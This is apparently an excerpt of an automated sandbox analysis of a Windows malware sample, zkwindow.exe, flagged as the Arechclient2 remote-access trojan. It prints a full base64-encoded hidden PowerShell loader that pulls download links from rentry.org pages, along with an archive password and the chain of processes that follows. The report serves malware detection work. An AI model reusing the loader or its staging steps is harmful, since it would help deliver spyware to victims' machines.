Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009897C4 9_2_009897C4
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C7870 9_2_009C7870
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0094599C 9_2_0094599C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BB990 9_2_009BB990
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0094B9C0 9_2_0094B9C0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C5900 9_2_009C5900
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00915A5C 9_2_00915A5C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C1A60 9_2_009C1A60
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009A9BB0 9_2_009A9BB0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00917C94 9_2_00917C94
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00927C64 9_2_00927C64
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009A3DD0 9_2_009A3DD0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B9D30 9_2_009B9D30
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00929D50 9_2_00929D50
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00921E3C 9_2_00921E3C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C7E50 9_2_009C7E50
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00951E64 9_2_00951E64
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00901F00 9_2_00901F00
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00995F50 9_2_00995F50
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D160E4 11_2_00D160E4
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CF44C0 11_2_00CF44C0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D165B8 11_2_00D165B8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D18840 11_2_00D18840
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D18BA8 11_2_00D18BA8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D68C7C 11_2_00D68C7C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D1EE2C 11_2_00D1EE2C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D18FC0 11_2_00D18FC0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C70F18 11_2_00C70F18
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D1D140 11_2_00D1D140
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D172C0 11_2_00D172C0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D0D200 11_2_00D0D200
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D4534C 11_2_00D4534C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4F48C 11_2_00C4F48C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D15694 11_2_00D15694
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D1D8C8 11_2_00D1D8C8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D698A0 11_2_00D698A0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D119E8 11_2_00D119E8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D15948 11_2_00D15948
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D1BA54 11_2_00D1BA54
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C49CF4 11_2_00C49CF4
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D11E00 11_2_00D11E00
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D19F2C 11_2_00D19F2C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162A114 11_2_0162A114
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162A534 11_2_0162A534
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01621D06 11_2_01621D06
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0161C6E9 11_2_0161C6E9
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162B1C0 11_2_0162B1C0
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01631218 11_2_01631218
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01629461 11_2_01629461
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162D7EA 11_2_0162D7EA
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01629934 11_2_01629934
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162BA90 11_2_0162BA90
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_0162FD34 11_2_0162FD34
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01621D06 11_2_01621D06
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01629D08 11_2_01629D08
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7zip\7za.exe FBB3DADCC29BCBC5460484D858C5F33F99E5317F5F6CD8D9C83F4DD8C39B3E30
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\zkwindow.exe Code function: String function: 00007FF7013C88B0 appears 35 times
Source: C:\Users\user\Desktop\zkwindow.exe Code function: String function: 00007FF7013CBDF8 appears 51 times
Source: C:\Users\user\Desktop\zkwindow.exe Code function: String function: 00007FF7013CBB7C appears 126 times
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: String function: 008E2448 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: String function: 008E4184 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D26958 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D522E0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 0162BA34 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 01633195 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D26A88 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D3F428 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00C5D308 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D2608C appears 126 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D28FC0 appears 507 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D52284 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D28EC4 appears 117 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D261A8 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: String function: 00D0E464 appears 67 times
Sample file is different than original file name gathered from version info
Source: zkwindow.exe, 00000000.00000000.1236744170.00007FF7013FC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename: vs zkwindow.exe
Source: zkwindow.exe Binary or memory string: OriginalFilename: vs zkwindow.exe
Uses 7zip to decompress a password protected archive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
Very long command line found
Source: C:\Users\user\Desktop\zkwindow.exe Process created: Commandline size = 6070
Source: C:\Users\user\Desktop\zkwindow.exe Process created: Commandline size = 6070 Jump to behavior
Yara signature match
Source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/28@3/3
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008FA960 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 9_2_008FA960
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008ECB18 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 9_2_008ECB18
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008ECA6C GetDiskFreeSpaceExW,GetDiskFreeSpaceW, 9_2_008ECA6C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4EB6E FreeResource, 11_2_00C4EB6E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\5c8947d1385c4e608aa7a0853c65418d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Users\user\Desktop\zkwindow.exe Mutant created: \Sessions\1\BaseNamedObjects\executable soft
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ltawufd.hkp.ps1 Jump to behavior
Source: zkwindow.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: zkwindow.exe Virustotal: Detection: 18%
Source: unknown Process created: C:\Users\user\Desktop\zkwindow.exe "C:\Users\user\Desktop\zkwindow.exe"
Source: C:\Users\user\Desktop\zkwindow.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\zkwindow.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkA Jump to behavior
